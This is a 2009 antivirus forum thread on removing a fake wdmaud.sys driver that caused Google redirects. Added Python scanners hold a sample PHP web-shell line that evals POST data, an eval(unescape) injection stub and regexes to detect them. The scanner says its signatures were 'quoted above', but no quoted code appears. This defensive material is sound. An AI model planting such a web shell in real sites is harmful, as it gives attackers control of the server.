Topic: Blocked 78.110.175.21 and bogus google links


Offline DavidR

Re: Blocked 78.110.175.21 and bogus google links
« Reply #15 on: January 01, 2009, 04:52:22 PM »
Anyone with a copy of this file should submit it to avast.

Send the sample to virus@avast.com zipped and password protected with the password in email body, a link to this topic might help and undetected malware in the subject.

Or you can also add the file to the User Files (File, Add) section of the avast chest (if it isn't already there) where it can do no harm and send it from there (select the file, right click, email to Alwil Software). No need to zip and PW protect when the sample is sent from chest. A copy of the file/s will remain in the original location, so any further action you take can remove that. Send it from the User Files section of the chest (select the file, right click, email to Alwil Software).

This process has been modified in the latest version to make it easier, it doesn't actually get emailed, but transferred when the next avast auto (or manual) update is done.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.1.6099 (build 24.1.8821.762) UI 1.0.796/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

entulsar

Re: Blocked 78.110.175.21 and bogus google links
« Reply #16 on: January 01, 2009, 04:56:26 PM »
I GOT THIS IN VISTA BUT ONLY WHEN I TRY TO LOG ONTO A GAME CALLED GRUDGE MU,NOW I GO HUNTING  HEHE

spg SCOTT

Re: Blocked 78.110.175.21 and bogus google links
« Reply #17 on: January 01, 2009, 05:21:34 PM »
Yes!  I had the wrong folder!  Deleting c:\windows\system32\drivers\wdmaud.sys worked perfectly!  Thanks Nobody71!

Isn't that the one you said previously didn't work? ???

Deleting wdmaud.sys from the drivers folder didn't fix my problem (exact symptoms as everybody else with 7.7.7.0 and 78.110.175.21) .  BTW as soon as I delete the file, another one pops back up in that folder.

is that the one you deleted or did you delete the one in the system32 folder, I'm confused

bahog

Re: Blocked 78.110.175.21 and bogus google links
« Reply #18 on: January 01, 2009, 08:09:08 PM »
Nobody71,

Renamed wdmaud.sys file, put copy into chest, deleted system 32 file. Google search has no redirection and no more two minute warning.

Love your work

Many thanks.

bahog

bahog

Re: Blocked 78.110.175.21 and bogus google links
« Reply #19 on: January 01, 2009, 08:22:05 PM »
Anyone with a copy of this file should submit it to avast.
Or you can also add the file to the User Files (File, Add) section of the avast chest (if it isn't already there) where it can do no harm and send it from there.

Consider this done.

Bahog

Offline DavidR

Re: Blocked 78.110.175.21 and bogus google links
« Reply #20 on: January 01, 2009, 08:32:36 PM »
Thanks for helping improve detections.

Welcome to the forums.

Aokin

Re: Blocked 78.110.175.21 and bogus google links
« Reply #21 on: January 01, 2009, 09:07:39 PM »
Thanks Nobody71

ozwally

Re: Blocked 78.110.175.21 and bogus google links
« Reply #22 on: January 01, 2009, 11:36:41 PM »
I put that file in the virus chest first, but this alone didn't prevent the problem. Is it supposed to?
(I didn't restart though)

Renaming it solved all of my symptoms (Javascript is back on with no problems).

Thanks everyone for your help.

Offline DavidR

Re: Blocked 78.110.175.21 and bogus google links
« Reply #23 on: January 02, 2009, 12:19:38 AM »
Moving it to the chest (after a detection) would achieve the same as renaming it (the file essentially isn't there, not in the original name or if moved to the chest). However, if you manually send a copy to the chest then there will still be a copy in the original location, as my previous post mentioned.

Quote from: DavidR
Or you can also add the file to the User Files (File, Add) section of the avast chest (if it isn't already there) where it can do no harm and send it from there (select the file, right click, email to Alwil Software). No need to zip and PW protect when the sample is sent from chest. A copy of the file/s will remain in the original location, so any further action you take can remove that. Send it from the User Files section of the chest (select the file, right click, email to Alwil Software).

I have highlighted the relevant bit, you probably missed that buried amongst all the other info.

ras

Re: Blocked 78.110.175.21 and bogus google links
« Reply #24 on: January 02, 2009, 12:29:44 AM »
I had the same Blocked message popping up. It started after my website was hacked. It is due to hacked HTML or PHP files where the hacker inserted the following code, which you can see when you view the page source:


I am still in the process of cleaning this unwanted code out of my web files. :(

If anyone still encounters the same problem, try checking the page source of the website you are currently browsing and see if there is suspect code in it.
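A small scanner for the kind of injection ras describes, written as an added example for this thread rather than code from the post or from avast. The signatures are taken from the injected snippets quoted above (the fake "Yahoo! Counter" comment wrapping an eval(unescape(...)) call, and the PHP handler named tmp_lkojfghx that evals POST data); the sample pages are constructed for the self-test.

```python
import re
from pathlib import Path

# Markers taken from the injected HTML/JS and PHP quoted in this thread.
SIGNATURES = {
    "js_fake_yahoo_counter": re.compile(r"<!--\s*Yahoo!\s*Counter\s*starts", re.I),
    "js_eval_unescape": re.compile(r"eval\s*\(\s*unescape\s*\(", re.I),
    "php_eval_post": re.compile(r"eval\s*\(\s*\$_POST\s*\[", re.I),
    "php_tmp_lkojfghx": re.compile(r"tmp_lkojfghx", re.I),
}


def scan_text(text):
    """Return the names of every signature that matches in `text` (empty list if clean)."""
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_tree(root, exts=(".html", ".htm", ".php")):
    """Walk a web root and map each suspect file (relative path) to its matched signatures."""
    hits = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in exts:
            found = scan_text(p.read_text(encoding="utf-8", errors="replace"))
            if found:
                hits[p.relative_to(root).as_posix()] = found
    return hits


# Constructed sample pages (not files from the thread) used to exercise the scanner.
CLEAN_HTML = "<html><body><h1>Hello</h1><script>var x = 1;</script></body></html>"
INFECTED_HTML = (
    "<html><body>ok"
    "<script language=javascript><!-- Yahoo! Counter starts\n"
    "if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%3C%64%69%76'));var yahoo_counter=1;\n"
    "<!-- counter end --></script></body></html>"
)
INFECTED_PHP = "<?php if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']); ?>"

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_HTML), ("html", INFECTED_HTML), ("php", INFECTED_PHP)):
        print(label, scan_text(page) or "no match")
```

Run scan_tree("/path/to/webroot") against a copy of the site; any hit is a file to restore from a known-good backup rather than edit in place.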

klal

Re: Blocked 78.110.175.21 and bogus google links
« Reply #25 on: January 02, 2009, 02:27:26 AM »
Had this same annoying problem of fake Google searches and blocked attempts to access that malicious website - thanks to the solution highlighted in this thread, I managed to get rid of the problem. Wish I had read this a bit earlier and saved myself some agony.

REDACTED

Re: Blocked 78.110.175.21 and bogus google links
« Reply #26 on: January 02, 2009, 03:42:51 AM »
Quote from: klal
Had this same annoying problem of fake Google searches and blocked attempts to access that malicious website - thanks to the solution highlighted in this thread, I managed to get rid of the problem. Wish I had read this a bit earlier and saved myself some agony.

What solution is highlighted? Where? I'm new here so please excuse my ignorance.

randelfi

Re: Blocked 78.110.175.21 and bogus google links
« Reply #27 on: January 02, 2009, 04:04:47 AM »
I found several references online to various malware hiding as a legitimate Windows driver, wdmaud.sys, which is an audio-related driver.  There should only be two files with this name in the following two locations:

C:\WINDOWS\SYSTEM32\wdmaud.drv
and
C:\WINDOWS\SYSTEM32\DRIVERS\wdmaud.sys

In my case, there was a bogus "wdmaud.sys" in the SYSTEM32 folder (not the \DRIVERS subfolder). I did the following:
1. Rename all *wdmaud*.* files to "zzz_wdmaud.*".
2. Run the Windows system file comparator from the Command Window as sfc /SCANNOW. This restores the correct wdmaud files.
3. Once everything is running again, delete the renamed files.

This appears to have ended the "blocked access to infected site 78.110.175.21" message for me. 

By the way, I ran Avast!, SpywareDoctor, CounterSpy and CCleaner (to eliminate old junk) and none of these detected anything!

Richard
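A check that automates the first part of randelfi's procedure: list every *wdmaud* file under a Windows directory and flag any that is not one of the two expected files. This is an added example, not code from the post or from Microsoft; the demo builds a constructed directory tree mirroring the case above rather than touching a real system.

```python
import tempfile
from pathlib import Path

# The only two locations the post says wdmaud files legitimately live in,
# relative to the Windows directory (compared case-insensitively, as NTFS does).
EXPECTED = ("system32/wdmaud.drv", "system32/drivers/wdmaud.sys")


def find_unexpected_wdmaud(windows_root):
    """Return sorted relative paths of *wdmaud* files that are not in an expected location."""
    root = Path(windows_root)
    expected = {e.lower() for e in EXPECTED}
    unexpected = []
    for p in root.rglob("*"):
        # Same filter as the "rename all *wdmaud*.*" step: any name containing wdmaud.
        if p.is_file() and "wdmaud" in p.name.lower():
            rel = p.relative_to(root).as_posix()
            if rel.lower() not in expected:
                unexpected.append(rel)
    return sorted(unexpected)


def demo():
    """Constructed tree: the two legitimate files plus the bogus SYSTEM32\\wdmaud.sys."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel in ("SYSTEM32/wdmaud.drv", "SYSTEM32/DRIVERS/wdmaud.sys", "SYSTEM32/wdmaud.sys"):
            f = Path(tmp, rel)
            f.parent.mkdir(parents=True, exist_ok=True)
            f.write_bytes(b"placeholder")  # contents are irrelevant to the location check
        return find_unexpected_wdmaud(tmp)


if __name__ == "__main__":
    print(demo())  # ['SYSTEM32/wdmaud.sys']
```

On a live machine call find_unexpected_wdmaud(r"C:\WINDOWS"); a file reported here is the candidate to rename before running sfc /SCANNOW, and a sample worth submitting to avast as the earlier replies describe.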



Offline spydier

Re: Blocked 78.110.175.21 and bogus google links
« Reply #28 on: January 02, 2009, 08:28:56 AM »
This also worked for me as an apparent instant fix: delete the file.

Seems a little too easy once you get the right file, haha.

Many thanks to the finder, nobody71.

Phil, I suggest reading the thread from page one; it won't take long, and if you have the bug in question it appears this is the fix.


klal

Re: Blocked 78.110.175.21 and bogus google links
« Reply #29 on: January 02, 2009, 01:03:45 PM »
Hi Phil,

The solution refers to moving the file wdmaud.sys, which you will most likely find in the c:\windows\system32 directory, to the quarantine area (using Avast!).

Here's the link to the post: http://forum.avast.com/index.php?topic=41423.msg347589#msg347589

Cheers,
Lal
